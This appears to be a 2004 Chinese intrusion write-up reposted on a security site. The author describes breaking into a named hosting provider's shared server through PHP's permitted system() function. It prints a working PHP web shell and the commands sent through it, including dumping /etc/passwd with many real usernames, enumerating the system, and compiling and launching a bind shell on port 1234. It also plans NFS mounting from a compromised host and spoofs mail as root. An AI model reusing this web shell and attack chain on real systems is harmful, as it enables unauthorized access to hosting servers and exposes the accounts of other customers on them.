首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>入侵实例>文章内容
PHP配置漏洞攻击
来源:vfocus.net 作者:vitter 发布时间:2004-03-23  

PHP配置漏洞攻击


首先这些站点的问题主要出在允许使用system(),exec()等等这些函数,熟悉php的朋友应该知道,这些函数是调用系统指令的(虽然通过web server php程序只能有nobody权限),而且一般用户只要申请一个空间就可以获取局部的可写权限,令用户可以写一个web shell程序执行命令.在这些服务器上一般用户不能够登陆,也就是nologin(没有登陆shell,管理员可没那么"慷慨"!),这样利用system(),exec()这些函数就可以bind一个shell出来~!本文以虎翼网(www.51.net)的空间为例子(他是不是所有的服务器都有这个毛病我不知道~我只试验了我的空间所在的服务器):

1.写一个webshell先(php很容易做到)
?>php
#shell.php3
echo"<pre>";
system("$cmd");
echo"</pre>";
?>
2.上传到空间
3.执行(具体的服务器马赛克处理)
lynx http://xxx.51.net/cgi-bin/shell.php?cmd=id (看一下权限到底多大)
uid=171047(xxxx) gid=51(xxx) groups=51(xxx), 65534(nobody)
root真的很吝啬啊!
lynx http://xxx.51.net/cgi-bin/shell.php?cmd=uname -ras(看看系统)
FreeBSD xxx.51.net 3.3-RELEASE FreeBSD 3.3-RELEASE #11: Tue Mar 20
00:58:09 CST 2001 root@51.net:/usr/src/sys/compile/51NET i386
lynx http://xxx.51.net/cgi-bin/shell.php?cmd=cat
/etc/passwd(shadow是铁定看不到)
root:*:0:0:Charlie &:/root:/bin/csh
toor:*:0:0:Bourne-again Superuser:/root:
daemon:*:1:1:Owner of many system processes:/root:/sbin/nologin
operator:*:2:5:System &:/:/sbin/nologin
bin:*:3:7:Binaries Commands and Source,,,:/:/sbin/nologin
tty:*:107353:51:USER:/home/tty:/local/bin/null
kmem:*:5:65533:KMem Sandbox:/:/sbin/nologin
games:*:7:13:Games pseudo-user:/usr/games:/sbin/nologin
news:*:8:8:News Subsystem:/:/sbin/nologin
man:*:9:9:Mister Man Pages:/usr/share/man:/sbin/nologin
bind:*:53:53:Bind Sandbox:/:/sbin/nologin
uucp:*:66:66:UUCP
pseudo-user:/var/spool/uucppublic:/usr/libexec/uucp/uucico
xten:*:67:67:X-10 daemon:/usr/local/xten:/sbin/nologin
pop:*:68:6:Post Office Owner:/nonexistent:/sbin/nologin
ftp:*:70:70:FTP Daemon:/nonexistent:/sbin/nologin
nobody:*:65534:65534:Unprivileged user:/nonexistent:/sbin/nologin
quotauser1:*:997:51:quotauser:/home/quotauser1:/sbin/nologin
quotauser2:*:998:51:quotauser:/home/quotauser2:/sbin/nologin
quotauser3:*:999:51:quotauser:/home/quotauser3:/sbin/nologin
tian:*:1002:1002::/local/tian:/local/bin/ksh
sysadmin:*:1001:1001:System
Administrator:/local/sysadmin:/local/bin/ksh
test2:*:9999:51::/home/test2:/local/bin/null
xhjj:*:106200:51:USER:/home/xhjj:/sbin/nologin
zhinan:*:106201:51:USER:/home/zhinan:/local/bin/null
yes2:*:106202:51:USER:/home/yes2:/local/bin/null
daboy:*:106203:51:USER:/home/daboy:/local/bin/null
yesky:*:106204:51:USER:/home/yesky:/local/bin/null
yesk:*:106205:51:USER:/home/yesk:/local/bin/null
lnsyzzg:*:106206:51:USER:/home/lnsyzzg:/local/bin/null
fog:*:106207:51:USER:/home/fog:/local/bin/null
renshou:*:106208:51:USER:/home/renshou:/local/bin/null
hilen:*:106209:51:USER:/home/hilen:/local/bin/null
hapybird:*:106210:51:USER:/home/hapybird:/sbin/nologin
xiewei:*:106211:51:USER:/home/xiewei:/sbin/nologin
wwwer:*:106212:51:USER:/home/wwwer:/local/bin/null
larry:*:106213:51:USER:/home/larry:/local/bin/null
sunboys:*:106214:51:USER:/home/sunboys:/local/bin/null
everydayyuki:*:106215:51:USER:/home/everydayyuki:/local/bin/null
linguanxi:*:106216:51:USER:/home/linguanxi:/local/bin/null
baobao:*:106217:51:USER:/home/baobao:/local/bin/null
chaoshan:*:106218:51:USER:/home/chaoshan:/local/bin/null
hrstudio:*:106219:51:USER:/home/hrstudio:/local/bin/null
dengxian:*:106220:51:USER:/home/dengxian:/local/bin/null
simonstone:*:106221:51:USER:/home/simonstone:/local/bin/null
chenjian:*:106222:51:USER:/home/chenjian:/local/bin/null
lvxiangml:*:106223:51:USER:/home/lvxiangml:/local/bin/null
zzbxaxa:*:106224:51:USER:/home/zzbxaxa:/local/bin/null
pc2000:*:106225:51:USER:/home/pc2000:/local/bin/null
startexcel:*:106226:51:USER:/home/startexcel:/local/bin/null
model:*:106227:51:USER:/home/model:/local/bin/null
leogirl:*:106228:51:USER:/home/leogirl:/local/bin/null
fohcn:*:106229:51:USER:/home/fohcn:/local/bin/null
ljok:*:106230:51:USER:/home/ljok:/local/bin/null
baorui:*:106231:51:USER:/home/baorui:/local/bin/null
fky-jack:*:106232:51:USER:/home/fky-jack:/local/bin/null
zhaowen:*:106233:51:USER:/home/zhaowen:/local/bin/null
xiaojiaoya:*:106234:51:USER:/home/xiaojiaoya:/local/bin/null
zyinter:*:106235:51:USER:/home/zyinter:/local/bin/null
power:*:106236:51:USER:/home/power:/local/bin/null
feefan:*:106237:51:USER:/home/feefan:/local/bin/null
paradise:*:106238:51:USER:/home/paradise:/local/bin/null
wulc:*:106239:51:USER:/home/wulc:/local/bin/null
jcm:*:106240:51:USER:/home/jcm:/local/bin/null
liangxiaom:*:106241:51:USER:/home/liangxiaom:/local/bin/null
jingder:*:106242:51:USER:/home/jingder:/local/bin/null
hanjun:*:106243:51:USER:/home/hanjun:/local/bin/null
adai:*:106244:51:USER:/home/adai:/local/bin/null
fightben:*:106245:51:USER:/home/fightben:/local/bin/null
lihonghui-ooo:*:106246:51:USER:/home/lihonghui-ooo:/local/bin/null
xeno:*:106247:51:USER:/home/xeno:/local/bin/null
..................(太多了~省略)
只有几个用户有shell可以登陆,cp到我的目录下面,等一下分离出usrename看看有没有白痴username=passwd的~呵呵~

lynx http://xxx.51.net/cgi-bin/shell.php?cmd=set
HOME=/
PS1=$
OPTIND=1
PS2=>
PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/sbin
IFS=
他妈的~好差的"环境",被设置成这样....
lynx http://xxx.51.net/cgi-bin/shell.php?cmd=cat /etc/hosts
# $FreeBSD: src/etc/hosts,v 1.9.2.1 1999/08/29 14:18:44 peter Exp $
#
# Host Database
# This file should contain the addresses and aliases
# for local hosts that share this file.
# In the presence of the domain name service or NIS, this file may
# not be consulted at all; see /etc/host.conf for the resolution
order.
#
#
127.0.0.1 localhost localhost.my.domain myname.my.domain
#
# Imaginary network.
#10.0.0.2 myname.my.domain myname
#10.0.0.3 myfriend.my.domain myfriend
#
# According to RFC 1918, you can use the following IP networks for
# private nets which will never be connected to the Internet:
#
# 10.0.0.0 - 10.255.255.255
# 172.16.0.0 - 172.31.255.255
# 192.168.0.0 - 192.168.255.255
#
#................................(后门全市废话)
不算太小啊~hosts呵呵~
lynx http://xxx.51.net/cgi-bin/shell.php?cmd=whereis -b gcc
(老天保佑~有gcc)
gcc:/usr/sbin/gcc(万岁!!!!!!!!!!!!)
我来试试看~弄一个大家伙上去,编译一下,哈哈~速度好快!
webshell太累了,bind一个shell出来方便一点...(上传binshell程序,自己写也可以用perl/C,都不太难)
lynx http://xxx.51.net/cgi-bin/shell.php?cmd=gcc -o bind bindshell.c

lynx http://xxx.51.net/cgi-bin/shell.php?cmd=./bind 1234
bind shell too port 1234
telnet xxx.51.net 1234
.....下面省略,反正就可以执行命令了
嗯~好像这台没装MySQL,可惜~呵呵~~~~~~~~~,对了oso.com.cn的好像有~,不过最近停了.....
lynx http://xxx.51.net/cgi-bin/shell.php...sr/sbin/rpcinfo -p
localhost
portmapper 100000 portmap sunrpc
rstatd 100001 rstat rstat_svc rup perfmeter
rusersd 100002 rusers
nfs 100003 nfsprog
ypserv 100004 ypprog
mountd 100005 mount showmount
ypbind 100007
walld 100008 rwall shutdown
yppasswdd 100009 yppasswd
etherstatd 100010 etherstat
rquotad 100011 rquotaprog quota rquota
sprayd 100012 spray
3270_mapper 100013
rje_mapper 100014
selection_svc 100015 selnsvc
database_svc 100016
rexd 100017 rex
alis 100018
sched 100019
llockmgr 100020
nlockmgr 100021
x25.inr 100022
statmon 100023
status 100024
bootparamd 100026 bootparam
ypupdated 100028 ypupdate
keyserv 100029 keyserver
tfsd 100037
nsed 100038
nsemntd 100039
pcnfsd 150001 pcnfs
amd 300019
cmsd 100068
ttdbserver 100083 tooltalk
哈哈~好像可以mount,等一下用肉鸡showmount看看~这我就不说了...
哈哈~玩玩 mail()看看
>?php
#mail.php3
mail("xxx@sina.com","hi","i'm Bytes");
?>
快去信箱看看~~~GOGOGO >>>>.....呀~真不错~发信人以root@51.net..





 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·另类网站入侵之一句话木马图片的
·0day批量拿站webshell,挖掘机是
·利用ewebeditor 5.5 - 6.0 鸡肋
·OmniPeek抓包的一点看法
·强大的嗅探工具ettercap使用教程
·Windows系统密码破解全攻略
·破解禁止SSID广播
·XSS偷取密码Cookies通用脚本
·XSS漏洞基本攻击代码
·Intel 3945ABG用OmniPeek 4.1抓
·KesionCMS V7.0科汛内容网站管理
·破解无线过滤MAC
  相关文章
·入侵www.cnwill.com
·跨越FSO,WSH写文件
·绕过Windows Rootkit检测系统
·Discuz!跨站大全
·Hook 系统服务隐藏端口
·挂钩Windows API
·用expect写的bbs猜密码工具
·在NT系列操作系统里让自己“消失
·建造永不被杀的80端口后门
·入侵日记一则(CPB论坛注入攻击)
·再谈突破各种防火墙的防护
·如何把ASP编写成DLL
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved